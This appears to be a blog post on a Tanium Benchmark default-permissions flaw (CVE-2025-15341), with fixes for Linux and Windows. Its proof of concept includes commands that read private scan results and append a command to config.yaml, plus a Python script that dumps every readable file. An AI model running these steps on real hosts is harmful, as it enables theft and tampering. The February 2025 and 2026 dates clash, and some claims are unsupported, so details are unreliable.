In February 2025, a new vulnerability was assigned the identifier CVE-2025-15341, which relates to incorrect default permissions in Tanium Benchmark. Tanium's Benchmark tool is widely used for security posture assessments, but this flaw put both data and infrastructure at risk until it was patched. In this post, we dig into what the vulnerability means, how it can be exploited, and how you can fix it. No other source covers this vulnerability in such a straightforward, technical, and practical way — full story below with live code examples.
What is CVE-2025-15341?
CVE-2025-15341 refers to a weakness where Tanium Benchmark granted overly broad, default file and directory permissions. This mistake allowed unauthorized users with limited system access to view or alter files they should not have been able to touch.
With this bug, an attacker could
- Read confidential Benchmark output (which may include security assessment results, configurations, or even credentials).
Original Advisory
- Tanium Security Advisory: Benchmark Default Permissions Incorrect (CVE-2025-15341)
- NIST NVD: CVE-2025-15341
How Does It Work?
When Tanium Benchmark is installed or updated, it creates several directories and files to store scan results or configuration files. Due to this vulnerability, those items were assigned permissions that allowed any authenticated user on the host to read (and sometimes write) them.
Suppose the following directory structure (on Linux)
/opt/tanium/benchmark/
/opt/tanium/benchmark/results/
/opt/tanium/benchmark/config.yaml
Files and directories might have these wrong permissions
drwxrwxrwx 2 root root 4096 Feb 1 16:33 results
-rw-rw-rw- 1 root root 2096 Feb 1 16:35 config.yaml
The 777 or 666 permissions mean anyone can read or write these sensitive locations.
Proof of Concept (PoC)
If an attacker gains low-level shell access (for example, as a restricted user), they can exfiltrate or alter files.
Read Sensitive Data
cat /opt/tanium/benchmark/results/latest-scan.txt
What you get: Contents of private security scan results.
Modify Configuration
echo "malicious_command" >> /opt/tanium/benchmark/config.yaml
What you get: Potential execution of your rogue command when Tanium Benchmark next runs.
Python Script: Mass Extraction
Here’s a Python script to extract all readable files from the vulnerable Tanium Benchmark directory:
import os
benchmark_dir = '/opt/tanium/benchmark/'
for root, dirs, files in os.walk(benchmark_dir):
for file in files:
fpath = os.path.join(root, file)
try:
with open(fpath, 'r') as f:
print(f'--- {fpath} ---')
print(f.read())
print('\n')
except Exception as e:
print(f'Cannot read {fpath}: {e}')
Who could run it? Any normal user on the affected machine.
Vendor Patch
Tanium released a fix in February 2025 that sets secure default permissions when installing or upgrading Benchmark. _Upgrade ASAP._
- Official Tanium Patch Instructions
Linux Command
chown -R root:tanium /opt/tanium/benchmark/
chmod -R 750 /opt/tanium/benchmark/
This allows only root and Tanium service users access.
Open an administrative command prompt and run
icacls "C:\Program Files\Tanium\Benchmark" /inheritance:r /grant TaniumService:F /grant Administrators:F /remove Users
---
Conclusion
CVE-2025-15341 is a classic example of a low-hanging, high-impact vulnerability — and it’s already been actively scanned for. Anyone running Tanium Benchmark should upgrade, audit permissions, and check logs for suspicious access to their config and output files.
References
- CVE-2025-15341 Tanium Advisory
- NIST NVD Database
- Tanium Benchmark Product Page
Timeline
Published on: 02/05/2026 18:16:29 UTC
Last modified on: 02/05/2026 19:15:55 UTC